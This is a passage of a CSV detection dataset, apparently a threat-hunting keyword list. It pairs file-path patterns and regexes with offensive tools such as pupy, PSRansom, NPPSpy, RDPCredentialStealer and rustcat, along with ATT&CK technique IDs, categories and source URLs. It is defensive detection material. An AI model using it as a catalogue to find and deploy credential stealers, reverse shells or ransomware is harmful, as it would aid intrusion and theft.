fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\PSprofile.exe*",".{0,1000}\\PSprofile\.exe.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*\PSPY.dll*",".{0,1000}\\PSPY\.dll.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\PSPY.exe*",".{0,1000}\\PSPY\.exe.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\pspy\pspy.go*",".{0,1000}\\pspy\\pspy\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*\PSRansom -*",".{0,1000}\\PSRansom\s\-.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","5","440","106","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z" "*\psscanner\psscanner.go*",".{0,1000}\\psscanner\\psscanner\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*\Public\chop.enc*",".{0,1000}\\Public\\chop\.enc.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" 
"*\Public\dcapi.dll*",".{0,1000}\\Public\\dcapi\.dll.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*\public\klogging.log*",".{0,1000}\\public\\klogging\.log.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*\Public\Music\RDPCreds.txt*",".{0,1000}\\Public\\Music\\RDPCreds\.txt.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer is malware that steals credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*\pupwinutils\*",".{0,1000}\\pupwinutils\\.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX.
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\pupy\external\creddump7*",".{0,1000}\\pupy\\external\\creddump7.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\pupyx64.exe*",".{0,1000}\\pupyx64\.exe.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\pupyx86.exe*",".{0,1000}\\pupyx86\.exe.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\PurpleSharp.exe*",".{0,1000}\\PurpleSharp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\pwn.exe*",".{0,1000}\\pwn\.exe.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\pwned.txt*",".{0,1000}\\pwned\.txt.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential 
Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*\pxlib\bin\wmiexec.x86.o*",".{0,1000}\\pxlib\\bin\\wmiexec\.x86\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\PyClone.py*",".{0,1000}\\PyClone\.py.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*\PyExfil\pyexfil\*",".{0,1000}\\PyExfil\\pyexfil\\.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\Pyobfadvance*",".{0,1000}\\Pyobfadvance.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*\Pyobfexecute*",".{0,1000}\\Pyobfexecute.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*\pyobfgood*",".{0,1000}\\pyobfgood.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - 
T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*\Pyobflite*",".{0,1000}\\Pyobflite.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*\Pyobfpremium*",".{0,1000}\\Pyobfpremium.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*\Pyobftoexe*",".{0,1000}\\Pyobftoexe.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*\Pyobfuse*",".{0,1000}\\Pyobfuse.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*\Pyobfusfile*",".{0,1000}\\Pyobfusfile.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - 
TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*\pyramid.py*",".{0,1000}\\pyramid\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\pyrdp_plugin.py*",".{0,1000}\\pyrdp_plugin\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\pysecdump.exe*",".{0,1000}\\pysecdump\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\pysnaffler\pysnaffler\*",".{0,1000}\\pysnaffler\\pysnaffler\\.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*\pysoxy.py*",".{0,1000}\\pysoxy\.py.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","0","N/A","10","10","118","47","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z" "*\Python-Rootkit\*",".{0,1000}\\Python\-Rootkit\\.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*\pywsus.py*",".{0,1000}\\pywsus\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*\QueryModuleClient.exe*",".{0,1000}\\QueryModuleClient\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\QuickViewAD.ps1*",".{0,1000}\\QuickViewAD\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*\r00t-3xp10it*",".{0,1000}\\r00t\-3xp10it.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\RagingRotator.go*",".{0,1000}\\RagingRotator\.go.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "*\Ransomware.dll*",".{0,1000}\\Ransomware\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - 
TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\Ransomware.exe",".{0,1000}\\Ransomware\.exe","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*\Ransomware.pdb*",".{0,1000}\\Ransomware\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\rarce.py*",".{0,1000}\\rarce\.py.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*\RasMan.cpp*",".{0,1000}RasMan\.cpp.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*\rasman.exe*",".{0,1000}\\rasman\.exe.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - 
TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*\RasMan.sln*",".{0,1000}RasMan\.sln.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*\RasmanPotato*",".{0,1000}\\RasmanPotato.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*\ratchatPT.go*",".{0,1000}\\ratchatPT\.go.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*\ratchatPT.syso*",".{0,1000}\\ratchatPT\.syso.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*\rats\badrat_cs\*",".{0,1000}\\rats\\badrat_cs\\.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" 
"*\rats\js_downloader.vba*",".{0,1000}\\rats\\js_downloader\.vba.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*\rattler.cpp*",".{0,1000}\\rattler\.cpp.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*\Rattler.exe*",".{0,1000}\\Rattler\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*\Rattler_32.exe*",".{0,1000}\\Rattler_32\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*\Rattler_x64.exe*",".{0,1000}\\Rattler_x64\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*\rattler-master*",".{0,1000}\\rattler\-master.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*\Rat-x64.exe*",".{0,1000}\\Rat\-x64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - 
T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Rat-x64.lnk*",".{0,1000}\\Rat\-x64\.lnk.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\rcat-v*-win-x86_64.exe*",".{0,1000}\\rcat\-v.{0,1000}\-win\-x86_64\.exe.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*\rdcman.py*",".{0,1000}\\rdcman\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
